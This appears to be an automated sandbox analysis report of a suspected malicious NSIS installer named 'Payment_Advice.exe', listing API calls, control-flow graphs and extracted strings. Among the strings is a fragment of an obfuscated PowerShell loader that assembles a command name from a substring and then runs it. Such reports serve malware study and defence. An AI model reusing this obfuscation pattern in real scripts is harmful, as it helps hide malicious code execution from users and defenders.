3316 405922 3313->3316 3314->3300 3314->3311 3315 405192 25 API calls 3314->3315 3317 405192 25 API calls 3314->3317 3339 405728 3314->3339 3347 405d82 3314->3347 3315->3300 3316->3290 3317->3314 3352 405ee8 lstrcpynW 3319->3352 3321 405a4c 3353 4059de CharNextW CharNextW 3321->3353 3324 405790 3324->3283 3324->3285 3325 40617c 5 API calls 3328 405a62 3325->3328 3326 405a93 lstrlenW 3327 405a9e 3326->3327 3326->3328 3330 405933 3 API calls 3327->3330 3328->3324 3328->3326 3329 40622b 2 API calls 3328->3329 3332 40597f 2 API calls 3328->3332 3329->3328 3331 405aa3 GetFileAttributesW 3330->3331 3331->3324 3332->3326 3333->3287 3335 40598d 3334->3335 3336 405993 CharPrevW 3335->3336 3337 40599f 3335->3337 3336->3335 3336->3337 3337->3291 3338->3305 3340 405b2f 2 API calls 3339->3340 3341 405734 3340->3341 3342 405743 RemoveDirectoryW 3341->3342 3343 40574b DeleteFileW 3341->3343 3345 405755 3341->3345 3344 405751 3342->3344 3343->3344 3344->3345 3346 405761 SetFileAttributesW 3344->3346 3345->3314 3346->3345 3348 406252 3 API calls 3347->3348 3349 405d89 3348->3349 3351 405daa 3349->3351 3359 405c06 lstrcpyW 3349->3359 3351->3314 3352->3321 3354 4059fb 3353->3354 3358 405a0d 3353->3358 3356 405a08 CharNextW 3354->3356 3354->3358 3355 405a31 3355->3324 3355->3325 3356->3355 3357 405960 CharNextW 3357->3358 3358->3355 3358->3357 3360 405c55 GetShortPathNameW 3359->3360 3361 405c2f 3359->3361 3363 405c6a 3360->3363 3364 405d7c 3360->3364 3384 405b54 GetFileAttributesW CreateFileW 3361->3384 3363->3364 3366 405c72 wsprintfA 3363->3366 3364->3351 3365 405c39 CloseHandle GetShortPathNameW 3365->3364 3367 405c4d 3365->3367 3368 405f0a 18 API calls 3366->3368 3367->3360 3367->3364 3369 405c9a 3368->3369 3385 405b54 GetFileAttributesW CreateFileW 3369->3385 3371 405ca7 3371->3364 3372 405cb6 GetFileSize GlobalAlloc 3371->3372 3373 405d75 CloseHandle 3372->3373 3374 405cd8 3372->3374 3373->3364 3375 405bd7 ReadFile 3374->3375 3376 405ce0 3375->3376 3376->3373 3386 405ab9 lstrlenA 3376->3386 3379 405cf7 lstrcpyA 3382 405d19 3379->3382 3380 405d0b 3381 405ab9 4 API calls 3380->3381 3381->3382 3383 405d50 SetFilePointer WriteFile GlobalFree 3382->3383 3383->3373 3384->3365 3385->3371 3387 405afa lstrlenA 3386->3387 3388 405b02 3387->3388 3389 405ad3 lstrcmpiA 3387->3389 3388->3379 3388->3380 3389->3388 3390 405af1 CharNextA 3389->3390 3390->3387 4358 402727 4359 4029c5 4358->4359 4360 40272e 4358->4360 4361 402734 FindClose 4360->4361 4361->4359 4362 401cab 4363 402b1b 18 API calls 4362->4363 4364 401cb2 4363->4364 4365 402b1b 18 API calls 4364->4365 4366 401cba GetDlgItem 4365->4366 4367 4024e6 4366->4367 3710 40232f 3711 402335 3710->3711 3712 402b38 18 API calls 3711->3712 3713 402347 3712->3713 3714 402b38 18 API calls 3713->3714 3715 402351 RegCreateKeyExW 3714->3715 3716 402791 3715->3716 3717 40237b 3715->3717 3718 402396 3717->3718 3719 402b38 18 API calls 3717->3719 3720 4023a2 3718->3720 3722 402b1b 18 API calls 3718->3722 3721 40238c lstrlenW 3719->3721 3723 4023bd RegSetValueExW 3720->3723 3724 403060 46 API calls 3720->3724 3721->3718 3722->3720 3725 4023d3 RegCloseKey 3723->3725 3724->3723 3725->3716 4368 4016af 4369 402b38 18 API calls 4368->4369 4370 4016b5 GetFullPathNameW 4369->4370 4371 4016cf 4370->4371 4377 4016f1 4370->4377 4374 40622b 2 API calls 4371->4374 4371->4377 4372 4029c5 4373 401706 GetShortPathNameW 4373->4372 4375 4016e1 4374->4375 4375->4377 4378 405ee8 lstrcpynW 4375->4378 4377->4372 4377->4373 4378->4377 4379 406c30 4382 4063c1 4379->4382 4380 406442 GlobalFree 4381 40644b GlobalAlloc 4380->4381 4381->4382 4383 406d2c 4381->4383 4382->4380 4382->4381 4382->4382 4382->4383 4384 4064c2 GlobalAlloc 4382->4384 4385 4064b9 GlobalFree 4382->4385 4384->4382 4384->4383 4385->4384 4386 4027b3 4387 402b38 18 API calls 4386->4387 4388 4027c1 4387->4388 4389 4027d7 4388->4389 4390 402b38 18 API calls 4388->4390 4391 405b2f 2 API calls 4389->4391 4390->4389 4392 4027dd 4391->4392 4412 405b54 GetFileAttributesW CreateFileW 4392->4412 4394 4027ea 4395 402893 4394->4395 4396 4027f6 GlobalAlloc 4394->4396 4397 40289b DeleteFileW 4395->4397 4398 4028ae 4395->4398 4399 40288a CloseHandle 4396->4399 4400 40280f 4396->4400 4397->4398 4399->4395 4413 40330d SetFilePointer 4400->4413 4402 402815 4403 4032f7 ReadFile 4402->4403 4404 40281e GlobalAlloc 4403->4404 4405 402862 WriteFile GlobalFree 4404->4405 4406 40282e 4404->4406 4408 403060 46 API calls 4405->4408 4407 403060 46 API calls 4406->4407 4411 40283b 4407->4411 4409 402887 4408->4409 4409->4399 4410 402859 GlobalFree 4410->4405 4411->4410 4412->4394 4413->4402 4414 4028b4 4415 402b1b 18 API calls 4414->4415 4416 4028ba 4415->4416 4417 4028f6 4416->4417 4418 4028dd 4416->4418 4419 402791 4416->4419 4421 402900 4417->4421 4422 40290c 4417->4422 4420 4028e2 4418->4420 4427 4028f3 4418->4427 4428 405ee8 lstrcpynW 4420->4428 4424 402b1b 18 API calls 4421->4424 4423 405f0a 18 API calls 4422->4423 4423->4427 4424->4427 4427->4419 4429 405e2f wsprintfW 4427->4429 4428->4419 4429->4419 4430 4014b8 4431 4014be 4430->4431 4432 401389 2 API calls 4431->4432 4433 4014c6 4432->4433 3684 4015b9 3685 402b38 18 API calls 3684->3685 3686 4015c0 3685->3686 3687 4059de 4 API calls 3686->3687 3697 4015c9 3687->3697 3688 401614 3689 401646 3688->3689 3690 401619 3688->3690 3694 401423 25 API calls 3689->3694 3702 401423 3690->3702 3691 405960 CharNextW 3693 4015d7 CreateDirectoryW 3691->3693 3696 4015ed GetLastError 3693->3696 3693->3697 3701 40163e 3694->3701 3696->3697 3698 4015fa GetFileAttributesW 3696->3698 3697->3688 3697->3691 3698->3697 3700 40162d SetCurrentDirectoryW 3700->3701 3703 405192 25 API calls 3702->3703 3704 401431 3703->3704 3705 405ee8 lstrcpynW 3704->3705 3705->3700 4434 401939 4435 402b38 18 API calls 4434->4435 4436 401940 lstrlenW 4435->4436 4437 4024e6 4436->4437 4438 402939 4439 402b1b 18 API calls 4438->4439 4440 40293f 4439->4440 4441 402972 4440->4441 4442 40294d 4440->4442 4444 402791 4440->4444 4443 405f0a 18 API calls 4441->4443 4441->4444 4442->4444 4446 405e2f wsprintfW 4442->4446 4443->4444 4446->4444 4447 40653d 4449 4063c1 4447->4449 4448 406d2c 4449->4448 4450 406442 GlobalFree 4449->4450 4451 40644b GlobalAlloc 4449->4451 4452 4064c2 GlobalAlloc 4449->4452 4453 4064b9 GlobalFree 4449->4453 4450->4451 4451->4448 4451->4449 4452->4448 4452->4449 4453->4452 4454 40173f 4455 402b38 18 API calls 4454->4455 4456 401746 4455->4456 4457 405b83 2 API calls 4456->4457 4458 40174d 4457->4458 4458->4458

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 403358-4033ee #17 SetErrorMode OleInitialize call 406252 SHGetFileInfoW call 405ee8 GetCommandLineW call 405ee8 GetModuleHandleW 7 4033f0-4033f7 0->7 8 4033f8-40340a call 405960 CharNextW 0->8 7->8 11 4034d8-4034de 8->11 12 4034e4 11->12 13 40340f-403415 11->13 16 4034f8-403512 GetTempPathW call 403324 12->16 14 403417-40341c 13->14 15 40341e-403424 13->15 14->14 14->15 17 403426-40342a 15->17 18 40342b-40342f 15->18 26 403514-403532 GetWindowsDirectoryW lstrcatW call 403324 16->26 27 40356a-403584 DeleteFileW call 402dba 16->27 17->18 20 403435-40343b 18->20 21 4034c9-4034d4 call 405960 18->21 24 403455-40346c 20->24 25 40343d-403444 20->25 21->11 37 4034d6-4034d7 21->37 33 40349a-4034b0 24->33 34 40346e-403484 24->34 31 403446-403449 25->31 32 40344b 25->32 26->27 42 403534-403564 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403324 26->42 44 40361a-403629 call 4037c0 OleUninitialize 27->44 45 40358a-403590 27->45 31->24 31->32 32->24 33->21 36 4034b2-4034c7 33->36 34->33 39 403486-40348e 34->39 36->21 43 4034e6-4034f3 call 405ee8 36->43 37->11 40 403490-403493 39->40 41 403495 39->41 40->33 40->41 41->33 42->27 42->44 43->16 57 403725-40372b 44->57 58 40362f-40363f call 4056c4 ExitProcess 44->58 47 403592-40359d call 405960 45->47 48 40360a-403611 call 4038b2 45->48 62 4035d4-4035de 47->62 63 40359f-4035b0 47->63 56 403616 48->56 56->44 60 4037a8-4037b0 57->60 61 40372d-40374a call 406252 * 3 57->61 69 4037b2 60->69 70 4037b6-4037ba ExitProcess 60->70 90 403794-40379f ExitWindowsEx 61->90 91 40374c-40374e 61->91 65 4035e0-4035ee call 405a3b 62->65 66 403645-40365f lstrcatW lstrcmpiW 62->66 68 4035b2-4035b4 63->68 65->44 80 4035f0-403606 call 405ee8 * 2 65->80 66->44 72 403661-403677 CreateDirectoryW SetCurrentDirectoryW 66->72 74 4035b6-4035cc 68->74 75 4035ce-4035d2 68->75 69->70 77 403684-4036ad call 405ee8 72->77 78 403679-40367f call 405ee8 72->78 74->62 74->75 75->62 75->68 89 4036b2-4036ce call 405f0a DeleteFileW 77->89 78->77 80->48 100 4036d0-4036e0 CopyFileW 89->100 101 40370f-403717 89->101 90->60 96 4037a1-4037a3 call 40140b 90->96 91->90 94 403750-403752 91->94 94->90 98 403754-403766 GetCurrentProcess 94->98 96->60 98->90 107 403768-40378a 98->107 100->101 103 4036e2-403702 call 405d82 call 405f0a call 405663 100->103 101->89 102 403719-403720 call 405d82 101->102 102->44 103->101 115 403704-40370b CloseHandle 103->115 107->90 115->101
                                                  APIs
                                                  • #17.COMCTL32 ref: 00403377
                                                  • SetErrorMode.KERNELBASE(00008001), ref: 00403382
                                                  • OleInitialize.OLE32(00000000), ref: 00403389
                                                    • Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
                                                    • Part of subcall function 00406252: LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
                                                    • Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280
                                                  • SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 004033B1
                                                    • Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5
                                                  • GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C6
                                                  • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Payment_Advice.exe",00000000), ref: 004033D9
                                                  • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Payment_Advice.exe",00000020), ref: 00403400
                                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403509
                                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040351A
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403526
                                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040353A
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403542
                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403553
                                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040355B
                                                  • DeleteFileW.KERNELBASE(1033), ref: 0040356F
                                                  • OleUninitialize.OLE32(?), ref: 0040361F
                                                  • ExitProcess.KERNEL32 ref: 0040363F
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp), ref: 0040364B
                                                  • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Payment_Advice.exe",00000000,?), ref: 00403657
                                                  • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403663
                                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040366A
                                                  • DeleteFileW.KERNEL32(0041FE90,0041FE90,?,';$Rejsemontrer=$Mazing.SubString(4669,3);.$Rejsemontrer($Mazing) ",?), ref: 004036C4
                                                  • CopyFileW.KERNEL32(00437800,0041FE90,00000001), ref: 004036D8
                                                  • CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 00403705
                                                  • GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040375B
                                                  • ExitWindowsEx.USER32(00000002,00000000), ref: 00403797
                                                  • ExitProcess.KERNEL32 ref: 004037BA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                  • String ID: "C:\Users\user\Desktop\Payment_Advice.exe"$';$Rejsemontrer=$Mazing.SubString(4669,3);.$Rejsemontrer($Mazing) "$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes$C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Whereas$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                  • API String ID: 4107622049-4187752809
                                                  • Opcode ID: 3a71142bea5852d146cd8a944560142c666d5a8b8df90e4b86a8bdae5e932891
                                                  • Instruction ID: d10961c3cf085e12fbe59355e5df5276e8fc63a686dc482ac58f4e9f7edec25e
                                                  • Opcode Fuzzy Hash: 3a71142bea5852d146cd8a944560142c666d5a8b8df90e4b86a8bdae5e932891
                                                  • Instruction Fuzzy Hash: 8CB1E070904211AAD720BF629D49A3B3EACEB45706F40453FF542B62E2D77C5A41CB7E

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 116 4052d1-4052ec 117 4052f2-4053bb GetDlgItem * 3 call 404162 call 404a2f GetClientRect GetSystemMetrics SendMessageW * 2 116->117 118 40547d-405484 116->118 140 4053d9-4053dc 117->140 141 4053bd-4053d7 SendMessageW * 2 117->141 120 405486-4054a8 GetDlgItem CreateThread FindCloseChangeNotification 118->120 121 4054ae-4054bb 118->121 120->121 123 4054d9-4054e3 121->123 124 4054bd-4054c3 121->124 125 4054e5-4054eb 123->125 126 405539-40553d 123->126 128 4054c5-4054d4 ShowWindow * 2 call 404162 124->128 129 4054fe-405507 call 404194 124->129 131 405513-405523 ShowWindow 125->131 132 4054ed-4054f9 call 404106 125->132 126->129 135 40553f-405545 126->135 128->123 137 40550c-405510 129->137 138 405533-405534 call 404106 131->138 139 405525-40552e call 405192 131->139 132->129 135->129 142 405547-40555a SendMessageW 135->142 138->126 139->138 143 4053ec-405403 call 40412d 140->143 144 4053de-4053ea SendMessageW 140->144 141->140 145 405560-40558b CreatePopupMenu call 405f0a AppendMenuW 142->145 146 40565c-40565e 142->146 155 405405-405419 ShowWindow 143->155 156 405439-40545a GetDlgItem SendMessageW 143->156 144->143 153 4055a0-4055b5 TrackPopupMenu 145->153 154 40558d-40559d GetWindowRect 145->154 146->137 153->146 157 4055bb-4055d2 153->157 154->153 158 405428 155->158 159 40541b-405426 ShowWindow 155->159 156->146 160 405460-405478 SendMessageW * 2 156->160 161 4055d7-4055f2 SendMessageW 157->161 162 40542e-405434 call 404162 158->162 159->162 160->146 161->161 163 4055f4-405617 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 161->163 162->156 165 405619-405640 SendMessageW 163->165 165->165 166 405642-405656 GlobalUnlock SetClipboardData CloseClipboard 165->166 166->146
                                                  APIs
                                                  • GetDlgItem.USER32(?,00000403), ref: 00405330
                                                  • GetDlgItem.USER32(?,000003EE), ref: 0040533F
                                                  • GetClientRect.USER32(?,?), ref: 0040537C
                                                  • GetSystemMetrics.USER32(00000015), ref: 00405384
                                                  • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004053A5
                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B6
                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053C9
                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D7
                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053EA
                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040540C
                                                  • ShowWindow.USER32(?,00000008), ref: 00405420
                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405441
                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405451
                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040546A
                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405476
                                                  • GetDlgItem.USER32(?,000003F8), ref: 0040534E
                                                    • Part of subcall function 00404162: SendMessageW.USER32(00000028,?,00000001,00403F8E), ref: 00404170
                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405493
                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_00005265,00000000), ref: 004054A1
                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004054A8
                                                  • ShowWindow.USER32(00000000), ref: 004054CC
                                                  • ShowWindow.USER32(?,00000008), ref: 004054D1
                                                  • ShowWindow.USER32(00000008), ref: 0040551B
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040554F
                                                  • CreatePopupMenu.USER32 ref: 00405560
                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405574
                                                  • GetWindowRect.USER32(?,?), ref: 00405594
                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AD
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E5
                                                  • OpenClipboard.USER32(00000000), ref: 004055F5
                                                  • EmptyClipboard.USER32 ref: 004055FB
                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405607
                                                  • GlobalLock.KERNEL32(00000000), ref: 00405611
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405625
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405645
                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405650
                                                  • CloseClipboard.USER32 ref: 00405656
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                  • String ID: {
                                                  • API String ID: 4154960007-366298937
                                                  • Opcode ID: f3fca72fe88596ceb2a1dc6132db26d4a0074a2eaed671f798e7e9429c30ec02
                                                  • Instruction ID: dd9d9050def2d8c918bbc93d53338e60564b8b02708ef31213df2d5f0290820b
                                                  • Opcode Fuzzy Hash: f3fca72fe88596ceb2a1dc6132db26d4a0074a2eaed671f798e7e9429c30ec02
                                                  • Instruction Fuzzy Hash: 51B15C70900209BFDB219F60DD89EAE7B79FB04355F40803AFA05BA1A0C7759E52DF69

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 412 405f0a-405f15 413 405f17-405f26 412->413 414 405f28-405f3e 412->414 413->414 415 405f44-405f51 414->415 416 406156-40615c 414->416 415->416 419 405f57-405f5e 415->419 417 406162-40616d 416->417 418 405f63-405f70 416->418 420 406178-406179 417->420 421 40616f-406173 call 405ee8 417->421 418->417 422 405f76-405f82 418->422 419->416 421->420 424 406143 422->424 425 405f88-405fc4 422->425 426 406151-406154 424->426 427 406145-40614f 424->427 428 4060e4-4060e8 425->428 429 405fca-405fd5 GetVersion 425->429 426->416 427->416 430 4060ea-4060ee 428->430 431 40611d-406121 428->431 432 405fd7-405fdb 429->432 433 405fef 429->433 435 4060f0-4060fc call 405e2f 430->435 436 4060fe-40610b call 405ee8 430->436 438 406130-406141 lstrlenW 431->438 439 406123-40612b call 405f0a 431->439 432->433 434 405fdd-405fe1 432->434 437 405ff6-405ffd 433->437 434->433 440 405fe3-405fe7 434->440 450 406110-406119 435->450 436->450 442 406002-406004 437->442 443 405fff-406001 437->443 438->416 439->438 440->433 446 405fe9-405fed 440->446 448 406040-406043 442->448 449 406006-40602c call 405db5 442->449 443->442 446->437 453 406053-406056 448->453 454 406045-406051 GetSystemDirectoryW 448->454 461 406032-40603b call 405f0a 449->461 462 4060cb-4060cf 449->462 450->438 452 40611b 450->452 458 4060dc-4060e2 call 40617c 452->458 455 4060c1-4060c3 453->455 456 406058-406066 GetWindowsDirectoryW 453->456 459 4060c5-4060c9 454->459 455->459 460 406068-406072 455->460 456->455 458->438 459->458 459->462 464 406074-406077 460->464 465 40608c-4060a2 SHGetSpecialFolderLocation 460->465 461->459 462->458 467 4060d1-4060d7 lstrcatW 462->467 464->465 469 406079-406080 464->469 470 4060a4-4060bb SHGetPathFromIDListW CoTaskMemFree 465->470 471 4060bd 465->471 467->458 473 406088-40608a 469->473 470->459 470->471 471->455 473->459 473->465
                                                  APIs
                                                  • GetVersion.KERNEL32(00000000,Completed,?,004051C9,Completed,00000000,00000000,00000000), ref: 00405FCD
                                                  • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 0040604B
                                                  • GetWindowsDirectoryW.KERNEL32(: Completed,00000400), ref: 0040605E
                                                  • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040609A
                                                  • SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 004060A8
                                                  • CoTaskMemFree.OLE32(?), ref: 004060B3
                                                  • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004060D7
                                                  • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004051C9,Completed,00000000,00000000,00000000), ref: 00406131
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                  • String ID: ';$Rejsemontrer=$Mazing.SubString(4669,3);.$Rejsemontrer($Mazing) "$: Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                  • API String ID: 900638850-3515442673
                                                  • Opcode ID: 767b1783d20f48028c3daf2e5817f9a09796155ef10d83a1b14549b8d5aa00da
                                                  • Instruction ID: 384f9b18ecc494a8ae61019a25258fdef34cde8ff9634092dda9820a5ebc2bca
                                                  • Opcode Fuzzy Hash: 767b1783d20f48028c3daf2e5817f9a09796155ef10d83a1b14549b8d5aa00da
                                                  • Instruction Fuzzy Hash: 51610331A40505ABDB209F25CC44AAF37B5EF04314F51813BE956BB2E1D73D8AA2CB5E

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 474 405770-405796 call 405a3b 477 405798-4057aa DeleteFileW 474->477 478 4057af-4057b6 474->478 479 40592c-405930 477->479 480 4057b8-4057ba 478->480 481 4057c9-4057d9 call 405ee8 478->481 483 4057c0-4057c3 480->483 484 4058da-4058df 480->484 487 4057e8-4057e9 call 40597f 481->487 488 4057db-4057e6 lstrcatW 481->488 483->481 483->484 484->479 486 4058e1-4058e4 484->486 489 4058e6-4058ec 486->489 490 4058ee-4058f6 call 40622b 486->490 491 4057ee-4057f2 487->491 488->491 489->479 490->479 498 4058f8-40590c call 405933 call 405728 490->498 494 4057f4-4057fc 491->494 495 4057fe-405804 lstrcatW 491->495 494->495 497 405809-405825 lstrlenW FindFirstFileW 494->497 495->497 499 40582b-405833 497->499 500 4058cf-4058d3 497->500 516 405924-405927 call 405192 498->516 517 40590e-405911 498->517 503 405853-405867 call 405ee8 499->503 504 405835-40583d 499->504 500->484 502 4058d5 500->502 502->484 514 405869-405871 503->514 515 40587e-405889 call 405728 503->515 506 4058b2-4058c2 FindNextFileW 504->506 507 40583f-405847 504->507 506->499 510 4058c8-4058c9 FindClose 506->510 507->503 511 405849-405851 507->511 510->500 511->503 511->506 514->506 519 405873-40587c call 405770 514->519 527 4058aa-4058ad call 405192 515->527 528 40588b-40588e 515->528 516->479 517->489 518 405913-405922 call 405192 call 405d82 517->518 518->479 519->506 527->506 530 405890-4058a0 call 405192 call 405d82 528->530 531 4058a2-4058a8 528->531 530->506 531->506
